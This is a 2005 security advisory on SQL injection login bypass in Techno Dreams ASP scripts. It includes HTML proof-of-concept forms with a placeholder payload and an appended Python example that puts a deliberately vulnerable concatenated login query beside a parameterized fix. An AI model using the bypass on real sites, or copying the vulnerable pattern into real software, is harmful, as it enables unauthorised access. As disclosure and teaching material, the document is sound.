| Subject: | [KAPDA::#9] Techno Dreams Scripts Vulnerabilities |
|---|---|
| Date: | 26 Oct 2005 17:15:28 -0000 |

[KAPDA::#9] Techno Dreams Scripts Vulnerabilities

KAPDA New advisory

Vulnerable products:
Techno Dreams Announcement Script
Techno Dreams Guestbook Script
Techno Dreams Mailing List Script
Techno Dreams WebDirectory Script

Vendor: http://www.t-dreams.com/
Risk: High
Vulnerability: SQL injection

Date:
--------------------
2005/10/22

About Techno Dreams Scripts
--------------------
Techno Dreams Announcement Script: If you have a site and want to make a section for Announcements or Recent News, then you might need this script.

Techno Dreams Guestbook Script: It uses MS Access with ability to be upgraded into SQL. Now, we've added an Admin Area for the script.

Techno Dreams Mailing List Script: Let your visitors join your mailing list... and send mass emails to all of this list. Very good but simple ASP script (MS Access but SQL upgradeable).

Techno Dreams WebDirectory: Simple yet effect search engine (if we could say about it; since it's look like a web directory). With some advance features like approval, hits, categories, advance search, admin area, what's new, new updated, and what's hot...

Vendor's description: http://www.t-dreams.com/downloads.asp

Discussion:
--------------------
Several scripts do not properly validate user-supplied input. A remote user can create specially crafted parameter values that will execute SQL commands on the underlying database.

Vulnerabilities:
--------------------
SQL injection in /admin/login.asp (Announcement - Guestbook - WebDirectory)
SQL injection in /login.asp (Mailing List)

Both are at the parameter named 'userid'. An attacker can enter an SQL command to log in as a low-level user (for all products).

Proof of Concepts:
--------------------

```html
<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://[target]/admin/login.asp">
<input type="hidden" name="userid" value="[SQL Injection]">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://[target]/login.asp">
<input type="hidden" name="userid" value="[SQL Injection]">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
```

Solution:
--------------------
No patch has been released by the vendor yet.

More Detail:
--------------------
http://www.kapda.ir/advisory-103.html
Visit the above link for more details.

Credit:
--------------------
Farhad Koosha of KAPDA
farhadkey [at} kapda.ir
Kapda - Security Science Researchers Institute of Iran
http://www.KAPDA.ir (PersianHacker.NET)
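
The flaw class described under Discussion, as an added example that is not part of the KAPDA advisory or the vendor's code: a login check built by string concatenation beside a parameterized one, with SQLite standing in for the scripts' MS Access backend. The table, column and function names and the sample rows are assumptions constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data; the schema is an assumption, not the vendor's.
    Passwords are stored in clear only to keep the example short; a real
    deployment stores a salted hash."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (userid TEXT PRIMARY KEY, passwd TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("o'neil", "hunter2")])
    return db


def login_concat(db, userid, passwd):
    """The pattern the advisory describes: form fields pasted into SQL text,
    so any quote in 'userid' becomes part of the statement's grammar."""
    sql = ("SELECT userid FROM users WHERE userid = '" + userid +
           "' AND passwd = '" + passwd + "'")
    return db.execute(sql).fetchone() is not None


def login_param(db, userid, passwd):
    """Hardened form: placeholders bind both values as data, never as SQL."""
    if not (isinstance(userid, str) and 0 < len(userid) <= 64):
        return False  # reject empty or oversized identifiers up front
    row = db.execute("SELECT 1 FROM users WHERE userid = ? AND passwd = ?",
                     (userid, passwd)).fetchone()
    return row is not None


def quote_probe(login, db):
    """Regression check for a fix: submit a legitimate userid containing an
    apostrophe and report whether the database treated it as data or SQL."""
    try:
        login(db, "o'neil", "hunter2")
        return "data"
    except sqlite3.OperationalError:
        return "parsed-as-sql"


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", quote_probe(login_concat, db))
    print("parameterized:", quote_probe(login_param, db))
```

In classic ASP the equivalent fix is to bind `userid` and `passwd` through an `ADODB.Command` object with parameters instead of building the query string.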